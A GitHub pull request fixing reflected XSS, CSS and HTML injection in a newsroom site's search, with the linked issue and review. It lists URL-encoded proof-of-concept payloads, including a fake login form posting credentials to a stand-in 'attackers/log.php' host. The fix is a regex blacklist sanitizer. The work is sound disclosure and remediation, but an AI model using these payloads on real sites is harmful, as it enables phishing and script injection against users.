### PR TITLE
[FIX] - XSS, CSS and HTML Injection

### LINKED ISSUE #225: [Security] XSS - CSS and HTML Injection Issue
Severity : CRITICAL
search input text are accepting Script from user input.

**Issue#1 : Reflected Cross Site Scripting (XSS)**

The application does not perform input validation and accepts the scripts and characters as an input. A user can execute malicious scripts in the application.

This may allow attackers to execute scripts in the victim’s browser which can disclose data, deface web sites, or redirect the user to malicious sites.

Link: 
      1. https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Chtml%3E+%3Ca+href%3D%23+onmouseover%3D%22alert(%27Hey.%20I%20got%20an%20vulnerbility%27)%22%3EThis+is+test+%3C%2Fa
      2. https://main--accenture-newsroom--hlxsites.hlx.live/search?q=--%21%3E%3Cimg+src%3D1+onerror%3Dalert%28%60XSS%60%29%3E

**Issue#2 : Vulnerable to CSS Injection**

The application does not perform input validation and accepts CSS code as an input. A user can execute scripts in the application. Attackers can inject and perform unwanted actions towards the system. We have seen the CSS injection in the application.    

Link: https://main--accenture-newsroom--hlxsites.hlx.page/search?q=%3Cstyle%3E*%7Bcolor%3Ared%7D%3C%2Fstyle%3E

image

**Issue#3 : Vulnerable HTML Injection**

This vulnerability occurs when user input is not correctly sanitized, and the output is not encoded.
 An injection allows the attacker to send a malicious HTML page to a victim.
 The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of
 the page, and consequently will parse and execute the whole page in the victim’s context.

Link: 
     1. https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Cform%20action=%22http://attackers/log.php%22%20method=%22post%22%3EUsername%3Cinput%20type=%22text%22%20name=%22user%22%3E%3Cbr%3Epassword%3Cinput%20type=%22password%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%3E%3C/form%3E
     2. https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Ch1%3EThis+is+Check+for+Size+%3C%2Fh1%3E+%3Ch6%3ETesting%3C%
cc: @amol-anand @ravkiran

### PR DESCRIPTION
**Pull request by raymond-h-dev**
Please always provide the [GitHub issue(s)](../issues) your PR is for, as well as test URLs where your change can be observed (before and after):

Fix #225

Test URLs:
**Issue#1 : Reflected Cross Site Scripting (XSS)**
- Before:
     **1.** https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Chtml%3E+%3Ca+href%3D%23+onmouseover%3D%22alert(%27Hey.%20I%20got%20an%20vulnerbility%27)%22%3EThis+is+test+%3C%2Fa
     **2.** https://main--accenture-newsroom--hlxsites.hlx.live/search?q=--%21%3E%3Cimg+src%3D1+onerror%3Dalert%28%60XSS%60%29%3E

- After: 
     **1**. https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=%3Chtml%3E+%3Ca+href%3D%23+onmouseover%3D%22alert(%27Hey.%20I%20got%20an%20vulnerbility%27)%22%3EThis+is+test+%3C%2Fa
     **2.** https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=--%21%3E%3Cimg+src%3D1+onerror%3Dalert%28%60XSS%60%29%3E

**Issue#2 : Vulnerable to CSS Injection**
     - Before:https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=%3Cstyle%3E*%7Bcolor%3Ared%7D%3C%2Fstyle%3E
     - After: https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=%3Cstyle%3E*%7Bcolor%3Ared%7D%3C%2Fstyle%3E

**Issue#3 : Vulnerable HTML Injection**
-Before:
      **1.** https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Cform%20action=%22http://attackers/log.php%22%20method=%22post%22%3EUsername%3Cinput%20type=%22text%22%20name=%22user%22%3E%3Cbr%3Epassword%3Cinput%20type=%22password%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%3E%3C/form%3E
      **2.** https://main--accenture-newsroom--hlxsites.hlx.live/search?q=%3Ch1%3EThis+is+Check+for+Size+%3C%2Fh1%3E+%3Ch6%3ETesting%3C%

-After
     **1.** https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=%3Cform%20action=%22http://attackers/log.php%22%20method=%22post%22%3EUsername%3Cinput%20type=%22text%22%20name=%22user%22%3E%3Cbr%3Epassword%3Cinput%20type=%22password%22%20name=%22pass%22%3E%3Cinput%20type=%22submit%22%3E%3C/form%3E
     **2.** https://225-xss-issue--accenture-newsroom--hlxsites.hlx.live/search?q=%3Ch1%3EThis+is+Check+for+Size+%3C%2Fh1%3E+%3Ch6%3

### CODE REVIEW

File: blocks/newslist/newslist.js [hunk 1]
```diff
@@ -327,6 +327,14 @@ async function updateYearsDropdown(block, articles) {
   addEventListenerToFilterYear(document.getElementById('filter-year'), window.location.pathname);
 }
 
+function ValidateSearchFormData(keyword) {
+  if (typeof keyword === 'undefined' || keyword === null) {
+    return '';
+  }
+  const sanitezedKeyword = keyword.replace(/[`%$^*()_+=[\]{}\\|<>/~]/g, '');
```
Comment (amol-anand) [inline blocks/newslist/newslist.js:334]: why not just add all non-word/number characters to the regex and convert it to a space? like this ->
`const sanitezedKeyword = keyword.replace(/\W+/g, ' ');`

Comment (raymond-h-dev) [reply blocks/newslist/newslist.js:334]: we i understand your point. however, we cannot simply replace all special characters with whitespace, as there are words that include special characters. Additionally, we provide support for other GEOs that have native special characters in their words. see some examples below.

**Keyword:** Geschäftsmodell in Europa zu etablieren 
**all special character replaced with whitespace** --> Results for "DTC Gesch ftsmodell in Europa zu etablieren
**Keyword:** riscaldamento globale a +1,5 °C 
**all special character replaced with whitespace** --> Results for "riscaldamento globale a 1 5 C"
**Keyword:** promoverá a próxima era em criatividade, 
**all special character replaced with whitespace** -->  Results for "promover a pr xima era em criatividade"
**Keyword:** $94 million U.S. 
**all special character replaced with whitespace** --> Results for "94 million U S"

**Review by amol-anand — APPROVED** [review]
